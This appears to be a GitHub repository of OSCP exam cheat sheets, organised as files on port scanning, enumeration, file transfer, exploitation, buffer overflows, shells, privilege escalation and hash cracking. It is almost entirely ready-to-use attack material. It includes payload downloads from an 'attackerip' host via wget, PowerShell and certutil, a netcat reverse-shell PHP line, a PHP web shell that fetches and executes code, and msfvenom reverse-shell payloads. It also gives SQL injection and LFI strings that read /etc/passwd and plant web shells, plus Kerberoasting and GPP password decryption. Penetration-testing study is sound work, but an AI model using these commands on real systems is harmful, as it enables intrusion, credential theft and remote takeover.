├── README.md ├── 8 - Crack ├── 2 - Port Scan ├── 1 - Roadmap ├── 4 - File Transfer ├── 6 - Exploitation ├── 0 - Buffer Overflow ├── 5 - Shells ├── 7 - Privilege Escalation └── 3 - Enumeration /README.md: -------------------------------------------------------------------------------- 1 | # OSCP 2 | 3 | ![OSCP](https://cdn-images-1.medium.com/max/1600/1*dunp7oguHArqzlU49-GX2Q.png) 4 | 5 | This repo contains the resources I used during the OSCP exam. I prepared it in an explanatory way, I hope you find it useful. Good luck guys!😈 6 | -------------------------------------------------------------------------------- /8 - Crack: -------------------------------------------------------------------------------- 1 | #Possible Hash - in Kali 2 | hash-identifier 3 | 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 4 | 5 | #with John 6 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 7 | 8 | #with Hashcat 9 | hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force 10 | 11 | #with Online 12 | https://crackstation.net/ 13 | 14 | -------------------------------------------------------------------------------- /2 - Port Scan: -------------------------------------------------------------------------------- 1 | #Full Port Scan 2 | nmap -p- --open -vvv -vvv -oN fullportscan 3 | 4 | #Script & Version Scan 5 | nmap -p 80,445 -sV -sC -vvv -vvv -O -oN versionscan 6 | 7 | #No Ping Scan 8 | nmap -Pn -vvv -oN nopingscan 9 | 10 | #Vuln Scan 11 | nmap -p 445 -T4 -Pn -A --script smb-vuln* -vvv -oN vulnscan 12 | 13 | #No DNS Resolution 14 | nmap -n -vvv -oN nodnsresolutionscan 15 | 16 | #UDP Scan 17 | nmap -sU --open -vvv -oN udpscan 18 | 19 | 20 | #Script 21 | https://github.com/21y4d/nmapAutomator 22 | 23 | -------------------------------------------------------------------------------- /1 - Roadmap: -------------------------------------------------------------------------------- 1 | Steps to be followed for the machine solution; 2 | 3 | 1. Port scan 4 | 2. Enumeration 5 | 3. Vulnerability research 6 | 4. The exploitation of vulnerability (user shell) 7 | 5. Privilege escalation (root/administrator shell) 8 | 9 | ------------------------------------------------------------------------------------------------------------------------------- 10 | 11 | File search; 12 | 13 | #for Windows 14 | dir C:\ /s/b | find /i “root.txt” 15 | 16 | #for Linux; 17 | updatedb 18 | locate root.txt 19 | 20 | ------------------------------------------------------------------------------------------------------------------------------- 21 | 22 | File read; 23 | 24 | #for Windows 25 | type C:\Users\Administrator\Desktop\root.txt 26 | 27 | #for Linux 28 | cat /root/root.txt 29 | 30 | ------------------------------------------------------------------------------------------------------------------------------- 31 | -------------------------------------------------------------------------------- /4 - File Transfer: -------------------------------------------------------------------------------- 1 | LINUX 2 | 3 | #Firstly, we create a web server on our own machine; 4 | python -m SimpleHTTPServer 5 | 6 | #Then we get our file over the webserver; 7 | wget http://attackerip/file 8 | curl http://attackerip/file > file 9 | 10 | ------------------------------------------------------------------------------------------------------------------------------ 11 | 12 | WINDOWS 13 | 14 | #Firstly, we create a web server on our own machine; 15 | python -m SimpleHTTPServer 16 | 17 | OPTION 1: 18 | 19 | #Then we get our file over the webserver; 20 | powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://attackerip/WindowsEnum/WindowsEnum.ps1','C:\Users\Public\Downloads\WindowsEnum.ps1') 21 | 22 | OPTION 2: 23 | 24 | #We run the following commands on the victim system, respectively; 25 | echo $webclient = New-Object System.Net.WebClient >>wget.ps1 26 | echo $url = "http://attackerip:port/Chimichurri.exe" >>wget.ps1 27 | echo $file = "ms10-059-exploit.exe" >>wget.ps1 28 | echo $webclient.DownloadFile($url,$file) >>wget.ps1 29 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 30 | 31 | 32 | OPTION 3: 33 | 34 | #Then we get our file over the webserver; 35 | certutil.exe -urlcache -split -f "http://attackerip/file.exe" 36 | 37 | 38 | -------------------------------------------------------------------------------- /6 - Exploitation: -------------------------------------------------------------------------------- 1 | 2 | #Search Exploit with google; 3 | site:exploit-db.com "October CMS" 4 | site:github.com "October CMS" 5 | 6 | 7 | #Search Exploit with searchsploit; 8 | searchsploit OpenSSL 9 | searchsploit OpenSSL | grep --invert-match 'PHP\|Heartbleed\|dos\|windows' 10 | 11 | searchsploit -p 41936.txt 12 | cp /usr/share/exploitdb/exploits/php/webapps/41936.txt . 13 | 14 | ------------------------------------------------------------------------------------------------------------------------------- 15 | #Compiler the exploit 16 | 17 | ##for Linux; 18 | 19 | which gcc 20 | gcc -o kernel-exploit 44298.c 21 | ./kernel-exploit 22 | 23 | or 24 | 25 | dos2unix exploit.sh (very useful ;) ) 26 | For more; https://tools.kali.org/reporting-tools/dos2unix 27 | 28 | 29 | ##for Windows; 30 | i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32 31 | 32 | ------------------------------------------------------------------------------------------------------------------------------- 33 | 34 | #Running the Exploit 35 | 36 | ##Firstly; 37 | chmod +x asd.sh 38 | or 39 | chmod 755 asd.sh 40 | 41 | ##Later; 42 | ./asd.sh 43 | python asd.py 44 | perl asd.pl 45 | ruby asd.rb 46 | php asd.php (php-curl is installed: apt install php-curl) 47 | 48 | ------------------------------------------------------------------------------------------------------------------------------ 49 | -------------------------------------------------------------------------------- /0 - Buffer Overflow: -------------------------------------------------------------------------------- 1 | Steps to be followed for the machine solution; 2 | 3 | Note: If after each debug operation performed, the application has become unresponsive; Immunity Debugger should be closed first, then the "vulnapp.exe" application should be restarted, and Attach and Run should be done on Immunity Debugger. 4 | 5 | 1. Segmentation fault; 6 | Send enough length string for victim system crash 7 | 8 | 2. Find the offset; 9 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 10 | 11 | 3. Control the EIP; 12 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 13 | 14 | 4. Find the bad chars; 15 | 16 | badchars = ( 17 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 18 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 19 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 20 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 21 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 22 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 23 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 24 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 25 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 26 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 27 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 28 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 29 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 30 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 31 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 32 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 33 | 34 | 35 | 5. Find a JMP ESP instruction; 36 | !mona modules #Listing the modules 37 | !mona modules -o #Listing only the modules that belong to the operating system.(We choose a module that has no memory protections and also does not contain bad characters at the pointer address.) 38 | /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb #Detection of the JMP ESP value 39 | !mona find -s “” -m vulnapp_dll.dll #Detection of the module in which JMP ESP value is passed 40 | 41 | 42 | 43 | 6. Create shellcode; 44 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f py -b '' -e x86/shikata_ga_nai 45 | 46 | 47 | -------------------------------------------------------------------------------- /5 - Shells: -------------------------------------------------------------------------------- 1 | #with PHP 2 | ---------------------------------------------------------------------------------------------------------- 3 | 4 | 5 | 6 | &1|nc 3333 >/tmp/f');?> 7 | 8 | 9 | ##Secure, simple PHP shell to load and execute code; 10 | 11 | if (isset($_REQUEST['fupload'])) { 12 | file_put_contents($_REQUEST['fupload'], file_get_contents("http://:8000/" . $_REQUEST['fupload'])); 13 | }; 14 | 15 | if (isset($_REQUEST['fexec'])) { 16 | echo "
" . shell_exec($_REQUEST['fexec']) . "
"; 17 | }; 18 | 19 | ##Start the listener on the attacker machine; 20 | nc -lvp 1234 21 | 22 | ##Call the script and get the shell; 23 | http://10.10.10.9/catch.php?fexec=nc.exe 1234 -e cmd.exe``` 24 | 25 | 26 | ------------------------------------------------------------------------------------------------------------------------------ 27 | 28 | #with Msfvenom 29 | 30 | ##Listing payloads (spesific); 31 | msfvenom -l payloads | grep "cmd/unix" | awk '{print $1}' 32 | 33 | .exe; 34 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1337 -f exe > asd.exe 35 | 36 | .aspx 37 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > asd.aspx 38 | 39 | .jsp 40 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=3333 -f raw > asd.jsp 41 | 42 | .war 43 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=3333 -f war > shell.war 44 | 45 | ---------------------------------------------------------------------------------------------------------- 46 | 47 | #with Kali 48 | 49 | /usr/share/laudanum/ 50 | 51 | ---------------------------------------------------------------------------------------------------------- 52 | 53 | #with online reverse shell 54 | 55 | http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 56 | 57 | ---------------------------------------------------------------------------------------------------------- 58 | 59 | #Upgrading simple shells to fully interactive TTYs 60 | 61 | ##With bash; 62 | /bin/bash -i 63 | 64 | 65 | ##With sh; 66 | /bin/sh -i 67 | 68 | 69 | ##With echo; 70 | echo 'os.system('/bin/bash')' 71 | 72 | 73 | ##With python; 74 | python -c 'import pty; pty.spawn("/bin/bash")' 75 | python -c 'import pty; pty.spawn("/bin/sh")' 76 | 77 | 78 | ##With mawk; 79 | mawk 'BEGIN {system("/bin/sh")}' 80 | 81 | 82 | ##With perl; 83 | perl —e 'exec "/bin/sh";' 84 | 85 | 86 | ##Completing long file paths; 87 | CTRL +Z 88 | stty raw -echo 89 | fg + [Enter x 2] 90 | 91 | ---------------------------------------------------------------------------------------------------------- 92 | 93 | 94 | -------------------------------------------------------------------------------- /7 - Privilege Escalation: -------------------------------------------------------------------------------- 1 | LINUX 2 | 3 | #Firstly, you can run the script below. It is important that you read the output of this script. 4 | https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 5 | 6 | #Kernel and OS 7 | uname -a 8 | cat /etc/issue 9 | cat /etc/redhat-release //Redhat 10 | cat /etc/lsb-release //Debian 11 | 12 | 13 | #Misconfiguration sudo; 14 | sudo -l 15 | sudo -u scriptmanager bash //Change user with "sudo" command 16 | 17 | 18 | #Detection of programs with SUID bits; 19 | find / -perm +4000 -user root -type f -print 2>/dev/null 20 | 21 | 22 | #Scheduled jobs; 23 | crontab -l 24 | cat /etc/crontab 25 | 26 | 27 | #Detection of services run by root; 28 | ps aux | grep root 29 | 30 | 31 | #Detection of installed applications; 32 | ls -alh /usr/bin/ 33 | ls -alh /sbin/ 34 | dpkg -l 35 | 36 | 37 | #For more of the manual enumeration steps; 38 | https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 39 | 40 | 41 | ------------------------------------------------------------------------------------------------------------------------------- 42 | 43 | WINDOWS 44 | 45 | #For the detection of missing patches; 46 | https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py 47 | 48 | 49 | #Operating System 50 | systeminfo 51 | wmic qfe 52 | 53 | 54 | #Users 55 | whoami 56 | echo %USERNAME% 57 | net users 58 | net user 59 | whoami /priv 60 | net localgroup 61 | 62 | #Network 63 | ipconfig /all 64 | route print 65 | arp -A 66 | netstat -ano 67 | 68 | 69 | #Programs 70 | dir /a "C:\Program Files" 71 | dir /a "C:\Program Files (x86)" 72 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 73 | 74 | 75 | #Unquoted Service Patch 76 | wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """ 77 | 78 | 79 | #Scheduled task; 80 | schtasks /query /fo LIST 2>nul | findstr TaskName 81 | dir C:\windows\tasks 82 | 83 | 84 | #For more of the manual enumeration steps; 85 | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 86 | 87 | 88 | #For application examples; 89 | https://www.youtube.com/watch?v=Fms9UuW05DA&list=PLi0kul0fEhZ9LNZN0-A3nX2xcx2R70JwN 90 | 91 | 92 | #Groups.xml 93 | 94 | get Groups.xml 95 | cat Groups.xml (name, password) 96 | gpp-Decrypt password #decryp_password 97 | smbclient -W -U name ///share_name 98 | 99 | 100 | #SPN 101 | 102 | git https://github.com/SecureAuthCorp/impacket.git 103 | python GetUsersSPN.py /user:decrypt_password -dc-ip -request 104 | hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force 105 | 106 | ------------------------------------------------------------------------------------------------------------------------------- 107 | -------------------------------------------------------------------------------- /3 - Enumeration: -------------------------------------------------------------------------------- 1 | ### HTTP ### 2 | 3 | http:///robots.txt 4 | 5 | DIRECTORY BRUTE FORCE 6 | 7 | #with dirb; 8 | dirb http:/// 9 | dirb http:/// -r -o dirb.txt 10 | 11 | #with gobuster 12 | gobuster -u http:/// -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -o gobuster.txt 13 | gobuster -u http:/// -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -x html,php,asp,aspx -o gobuster.txt 14 | gobuster -u http:/// -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -k -x html,php,asp,aspx -o gobuster.txt 15 | 16 | #with wfuzz 17 | wfuzz --hc 404,400 -c -z file,/usr/share/dirb/wordlists/big.txt http:///FUZZ 18 | 19 | #with dirsearch 20 | python3 dirsearch.py -u http:/// -e php -x 403,404 -t 50 (Warning: This scan takes a long time to run) 21 | 22 | ****************************************************************************************************************************** 23 | 24 | VULNERABILITY SCAN 25 | 26 | #with nikto; 27 | nikto --host=http:// 28 | 29 | ****************************************************************************************************************************** 30 | 31 | LFI 32 | 33 | #for Linux; 34 | http://test.php?page=../../../../etc/passwd #basic 35 | http://test.php?page=../../../etc/passwd #null byte 36 | http://test.php?page=%252e%252e%252fetc%252fpasswd #double encoding 37 | 38 | 39 | for Windows; 40 | http:///test.php?page=../../../../../WINDOWS/win.ini 41 | http:///test.php?page=../../../../../xampp/apache/bin/php.ini 42 | 43 | ****************************************************************************************************************************** 44 | 45 | SQL Injection (Manual Steps) 46 | 47 | #Victim Address; 48 | http:///test.php?id=3' 49 | 50 | #Find the number of columns; 51 | http:///test.php?id=3 order by 5 52 | 53 | #Find space to output db 54 | http:///test.php?id=3 union select 1,2,3,4,5 55 | 56 | #Get db-username and db-version information from the database; 57 | http:///test.php?id=3 union select 1,2,version(),4,5 58 | http:///test.php?id=3 union select 1,2,user(),4,5 59 | 60 | #Get all tables; 61 | http:///test.php?id=3 union select 1,2,table_name,4,5 from information_schema.tables 62 | 63 | #Get all columns from a specific table; 64 | http:///test.php?id=3 union select 1,2, column_name 4,5 from information_schema.columns where table_name='wpusers' 65 | 66 | #Viewing files; 67 | http:///test.php?id=3' union select 1,2, load_file('/var/www/mysqli_connect.php') ,4,5 -- - 68 | http:///test.php?id=3' union select 1,2, load_file('/etc/passwd') ,4,5 -- - 69 | 70 | #Uploading files; 71 | http:///test.php?id=3' union select null,null, load_file('/var/www/brc_shell.php') ,4,5 -- - 72 | http:///test.php?id=3' union select null,null, "" ,4,5 into outfile '/var/www/brc_shell.php' -- - 73 | 74 | 75 | ****************************************************************************************************************************** 76 | 77 | SCENARIOS 78 | 79 | MySQL to SHELL 80 | 81 | #Put shell on db to victim system; 82 | select 1,2,3,'',6,7,8,9,10 INTO OUTFILE '/var/www/brc_shell.php'; 83 | 84 | #Call the shell and code execution; 85 | http:///shell.php?cmd=ifconfig 86 | 87 | 88 | LFI to RCE 89 | #Inject shell to victim system; 90 | 91 | 92 | #Call the shell and code execution; 93 | http:///shell.php?cmd=ls -la 94 | 95 | ****************************************************************************************************************************** 96 | 97 | CMS Enumeration 98 | 99 | #Wordpress 100 | wpscan --url http:/// --enumerate p --enumerate u --enumerate t 101 | 102 | #Joomla 103 | joomscan -u http:/// --enumerate-components 104 | 105 | #Drupal 106 | ./droopescan scan drupal -u 107 | 108 | ****************************************************************************************************************************** 109 | 110 | CURL 111 | 112 | #Uploading files to the victim system and changing the extension of the file uploaded to the victim system; 113 | echo worldofpentest > test.txt #create file 114 | curl -X PUT http:///brc.txt -d @test.txt #put to target 115 | curl http:///brc.txt #call the file 116 | 117 | #Victim system put to shell with curl; 118 | cp /usr/share/webshells/aspx/cmdasp.aspx . 119 | curl -X PUT http:///brc_shell.txt -d @cmdasp.aspx 120 | curl -X MOVE -H 'Destination:http:///shell.aspx' http:///brc_shell.txt 121 | 122 | Note: When we shell the victim system as above, we can get run time error in the system. 123 | The reason of this; the victim system noticed the shell we threw and erased the gaps. 124 | 125 | #To protect the spaces, we should use the command "--data-binary"; 126 | curl -X PUT http:///brc_shell.txt --data-binary @shell.aspx 127 | curl -X MOVE -H 'Destination:http:///shell.aspx' http:///brc_shell.txt 128 | 129 | ****************************************************************************************************************************** 130 | 131 | WebDAV Server Attacks 132 | 133 | #What types of files can I upload to the victim system? 134 | davtest --url http:// 135 | 136 | ------------------------------------------------------------------------------------------------------------------------------- 137 | 138 | ### DNS ### 139 | 140 | Firstly add the domain information detected during port scans to the file "/etc/hosts"; 141 | 142 | #Then check the DNS servers; 143 | dig ns 144 | 145 | or 146 | 147 | nslookup 148 | server 149 | 150 | #For zone transfer; 151 | dig @ns1.example.com example.com axfr 152 | 153 | or 154 | 155 | host -l 156 | 157 | Note: "dnsrecon" tool can also be used for this. 158 | 159 | ------------------------------------------------------------------------------------------------------------------------------- 160 | 161 | ### SMB ### 162 | 163 | #Controlling SMB shares; 164 | smbmap -H 165 | 166 | #Connect to SMB shares; 167 | smbclient \\\\\\share_name 168 | smbclient \\\\\\share_name -U mike 169 | 170 | #Check null sessions; 171 | rpcclient -U "" -N 172 | > srvinfo 173 | > enumdomusers 174 | > getdompwinfo 175 | > querydominfo 176 | 177 | Note: It is found on old windows servers. 178 | 179 | #Enumerate SMB shares; 180 | enum4Linux -a 181 | 182 | #SMB version numbering script; 183 | smbver.sh -> https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html 184 | 185 | ------------------------------------------------------------------------------------------------------------------------------- 186 | 187 | ### NFS ### 188 | 189 | #Controlling public shares; 190 | showmount -e 191 | 192 | Example shares; 193 | /var 194 | /asd 195 | 196 | #Mounting; 197 | mkdir brc #Indexing 198 | mount :/var brc #We mount the /var directory that is open on the target to the /brc directory that we have created on our own machine. 199 | 200 | ------------------------------------------------------------------------------------------------------------------------------- 201 | 202 | ### MySQL ### 203 | 204 | #Connecting to the MySQL; 205 | mysql --host=INSERTIPADDRESS -u root -p 206 | 207 | #Listing databases; 208 | show databases 209 | 210 | #Choosing a database; 211 | use information_schema 212 | 213 | #Uploading the shell; 214 | select 1,2,3,'',6,7,8,9,10 INTO OUTFILE '/var/www/brc_shell.php'; 215 | 216 | ------------------------------------------------------------------------------------------------------------------------------- 217 | 218 | 219 | 220 | 221 | 222 | --------------------------------------------------------------------------------